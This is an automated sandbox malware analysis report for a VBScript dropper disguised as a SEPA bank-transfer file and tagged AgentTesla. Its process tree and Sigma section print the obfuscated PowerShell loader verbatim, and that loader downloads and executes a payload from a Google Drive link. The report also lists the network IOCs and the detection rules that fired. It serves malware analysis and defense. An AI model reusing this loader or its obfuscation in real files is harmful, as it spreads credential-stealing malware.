Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Transferencias SEPA.vbs

Overview

General Information

Sample name:Transferencias SEPA.vbs
Analysis ID:1427936
MD5:73abc522ed981b48b4be2ba972900b68
SHA1:986995bde37b8ac4daff9b88e5d9bdf4f6b82d72
SHA256:f0ecd3e8f225833c8b6b7945c99e1f5c8a4ccb3332cfb4b7ab7b63d7d98d88f4
Tags:AgentTeslavbs
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 2700 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnudmLappa.Brug.NTallee KafftFersk.teddyW B,chestosnbAffreCtredalknastiDemoke To enCompetBrode ');anthropometry (Toxophilism87 'Be.ol$umaadGGge.de Uar,nTymbaaTha.ln EvejvDelpreCyllonSensodAss seLovbelSidetsNynaze Eksesy,unglSmackoSt.fsvA,tiaeRetian Per.e.inocs Vult. svinH,undfeMele.atelemd StraeInterrDissis Bo.e[Diona$Sek.nNGrnsey,eflet PredtFortyeBde insignadBiplae ManasAppro]An iu= .uic$Lexi.GAlfadi Equim.bjecmGeldeeSkr.erR.stalNoaa.aHi,simSpaltsStorh ');$Ampereomraadet=Toxophilism87 'balloGBut oeSideon kibsaMo.ybnresi,vIn faeBrakinKl.kedT ukhe Elevl H,ngsring e m shs Acrolsu,faoBank vSquase BhutnSaniceOk ids Fler.TilgaDSo.anoPaterw taktnebulll solsoB.rina verhd,efleF.ortliOrdgylDiploeAuto (Wo,se$PaataF ris,r PaleaL gderRegasaUnpepaRokk,d o,deeLodssdAsbe.e Po,b,Vi.il$ Hje ERhabdx Gynetserote OverrMeninnSkrubastryklOmlahiNicotsOvervt V ne)freml ';$Ampereomraadet=$liquorish[1]+$Ampereomraadet;$Externalist=$liquorish[0];anthropometry (Toxophilism87 'c.alo$Evelig.croalSwon.oSh,nkbGrensaptakilAccel:ScurfF De ulTop,gySkivgtRentet Udste ,ilid Afv eDmret5B,dtv3Semem=touch(Hyd tTJerseeRetousCarkit,eled- nconPProfoa DiartPreaphIndiv Hane,$ .ydaES.rifxTitretPree,eMagrerFlbedn ManiaEntonl S,ori Bin,sLugsatIs.la)Svirv ');while (!$Flyttede53) {anthropometry (Toxophilism87 'Exter$A.etagUnwillF.skeoRutscbAn.ihaAthyml Aale:StackU ReconValmuiVarmeoeffecnDidnhe ArberSpi tnSireneN,isk=Snarl$G atbtGenlorafgifuUru,ueTalsm ') ;anthropometry $Ampereomraadet;anthropometry (Toxophilism87 'UnconSIsospt.bsciaBank rDemartPara -TowelSAdvoklPaavie VapoeInd,fp Bran agna.4H rbi ');anthropometry (Toxophilism87 'Respo$PseudgO.ervl Jul.oRad.lbHypoma B bulSy.te: FaglFGagerlThen,yBaggrtSailptBun,ee Fro.dTrefae Uful5 jene3 st i=Over,(Un.alTAllegeC,kels Hi rtFagud-Lew,sPFlaucaPseudtAcrobh Drak Chim$Het rE Sti,xSndr tChondeComper AftenHmorra AlerlOpspoiWissfsHorolt O cu)Arbej ') ;anthropometry (Toxophilism87 'Laven$Udskng ,ecolS.bpeo.nforbAf,ada Ba elKvart: KorsROssmie sdumsTer,iiFjerngBort,nPlatte PolarTor,l7preda7Seeds=Speci$Neostg VeralcigaroEpimybOptllaTvrfalHasta: mblaKin.ttFigurl Per a SkrmsKnudde .umbnCerem+,ryll+Nonju%Verni$PlastU indwnAkkomd rgeeUnciar Au,ovma.thgFurunt.egroiCarpog Folkh UnuteH.emod Be,isStilm1Bille3afval4 Ambu.BoudocAgg eo Slufu,rndvn CeretUnsal ') ;$Fraraadede=$Undervgtigheds134[$Resigner77];}anthropometry (Toxophilism87 ' Snoo$ Ce.egBannelAffalo,aldybRo.leaN.ngrlKortl:H.nstNQuizeoP.lshnStyr,cTabitoOverpn Su asBecrat.oyalrO,dknuInhalcRoupetPectiiAromeoTofron Yuca Chak=Gen e MonogGTranse bio,tConge-PommeCHjer okashunUncoftSvve,eunangnAu,omtTmrer .kraa$ProsoE PlebxVedhntdanefe.langrGamogn .fbraHid rlRes.piClouesMu.ift Form ');anthropometry (Toxophilism87 'Anlg $unencgommatlSalg oSteelbUnbecaMe,allHelle:AllurDHumpbaskovanServenEthicePlenulDiurnsNotioe Myeln,ekst Pig t=Straf Det.[HuskeS TaagyAr,its rtshtAberre BoffmMedli.GengaCNedsloKomtenKatapvOv.rseSy,osrlli,gtUnmat]Expro:,argi: topmFSagkyrDevouoI.conm NarrB TegnaPy.mysSorroeGaste6Tyl.s4BabyeS Middtko.parFilitiStrimn.ispugHande(Affec$Rep.gNVir.loVet.rnKontocHypheoGribenSpisesG inst N.dkrLirkeu YankcHundetGeosiiForuno Da tnDagsk)L raw ');anthropometry (Toxophilism87 'Vejar$Holocg MicelSma hoHelhebs,miaa,ahool Or.i:Umbe,SMetolaGrubenFejl.sUdspaeValorlHaabeiP,atygAtom hT emoeu,ilad Koks Plagi=Gkke, anma,[ SamfST.uchyTvangsSkar,tGigasePredim.tten.NagysTf.ongeVristxNull.t omot. PengEForsonFixatcErklroLseladFuturiSamlenhypo,g Broc]Mel n: Rhin:Hij cA KiosS Mar C Kva,IHypopIFlids.O rafG Ink.eL.bstt UnroShype.tUdeblrS edpiBortgn Of.egCent (K uli$TaageD JongaFirepn C rinDefiaeTidsbl Igans,dspaeVapsenMedic)Varie ');anthropometry (Toxophilism87 ' sp.g$Goni.g HaralArkimoOverrbBiotoaRoyallOrdre: V tiFMed,cyPausenHyttebC oreo.herme Kis.r Encan IdreeFldeb=patri$Bere,SFoulma sktnKatols Op.ae DemolSo,iviGrnseg .ilphAcroseFrlaadEfter. Un,asGirokuhotmebTeknosKassetPyrenr Ep sist renOsteogParis(Syste3 Bor,0Spati4Thwar9O,ner8 Lang2Doler,pil t2 E.in9 adi3Koinc4 ,nde8Klu.e) Kult ');anthropometry $Fynboerne;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4844 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fldekager.Con && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6536INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x16d0a1:$b2: ::FromBase64String(
  • 0x16ed8e:$b2: ::FromBase64String(
  • 0x171248:$b2: ::FromBase64String(
  • 0x1712c9:$b2: ::FromBase64String(
  • 0x1797e8:$b2: ::FromBase64String(
  • 0x179821:$b2: ::FromBase64String(
  • 0x17985b:$b2: ::FromBase64String(
  • 0x179896:$b2: ::FromBase64String(
  • 0x1798d2:$b2: ::FromBase64String(
  • 0x17990f:$b2: ::FromBase64String(
  • 0x17994d:$b2: ::FromBase64String(
  • 0x17998c:$b2: ::FromBase64String(
  • 0x1799cc:$b2: ::FromBase64String(
  • 0x179a0d:$b2: ::FromBase64String(
  • 0x179a4f:$b2: ::FromBase64String(
  • 0x179a92:$b2: ::FromBase64String(
  • 0x179ad6:$b2: ::FromBase64String(
  • 0x179b1b:$b2: ::FromBase64String(
  • 0x179b61:$b2: ::FromBase64String(
  • 0x179ba8:$b2: ::FromBase64String(
  • 0x179bf0:$b2: ::FromBase64String(

Other

SourceRuleDescriptionAuthorStrings
amsi64_6536.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xe360:$b2: ::FromBase64String(
  • 0xd36f:$s1: -join
  • 0x6b1b:$s4: +=
  • 0x6bdd:$s4: +=
  • 0xae04:$s4: +=
  • 0xcf21:$s4: +=
  • 0xd20b:$s4: +=
  • 0xd351:$s4: +=
  • 0xf796:$s4: +=
  • 0xf816:$s4: +=
  • 0xf8dc:$s4: +=
  • 0xf95c:$s4: +=
  • 0xfb32:$s4: +=
  • 0xfbb6:$s4: +=
  • 0xdb5b:$e4: Get-WmiObject
  • 0xdd4a:$e4: Get-Process
  • 0xdda2:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs", ProcessId: 2700, ProcessName: wscript.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs", ProcessId: 2700, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnudmLappa.Brug.NTallee KafftFersk.teddyW B,chestosnb

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Multi AV Scanner detection for submitted file
Source: Transferencias SEPA.vbsReversingLabs: Detection: 21%
Source: Transferencias SEPA.vbsVirustotal: Detection: 13%Perma Link
Source: unknownHTTPS traffic detected: 173.194.219.101:443 -> 192.168.2.11:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.11:49708 version: TLS 1.2
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1433043987.000002497601B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1433043987.000002497604B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1434067052.00000249760C1000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: drive.google.com
Source: wscript.exe, 00000000.00000003.1260166665.0000023CBC336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000003.1271709936.0000023CBA2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1269652900.0000023CBA2F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1274229215.0000023CBA367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.1271709936.0000023CBA2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1269652900.0000023CBA2F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1274229215.0000023CBA367000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.1275759944.0000023CBC580000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab4-
Source: wscript.exe, 00000000.00000003.1260636781.0000023CBC5AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e95b4e6024d23
Source: wscript.exe, 00000000.00000003.1260226831.0000023CBC2F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabFH
Source: wscript.exe, 00000000.00000003.1261281787.0000023CBC5D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260636781.0000023CBC5AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e95b4e6024
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1424642021.00000249101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1384995967.0000024900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1384995967.0000024900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1384995967.0000024901E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.1384995967.00000249018B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbzaP
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.1384995967.000002490048D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1384995967.000002490048D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza&export=download
Source: powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1384995967.00000249012E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1433043987.000002497604B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000002.00000002.1424642021.00000249101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1384995967.0000024901E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
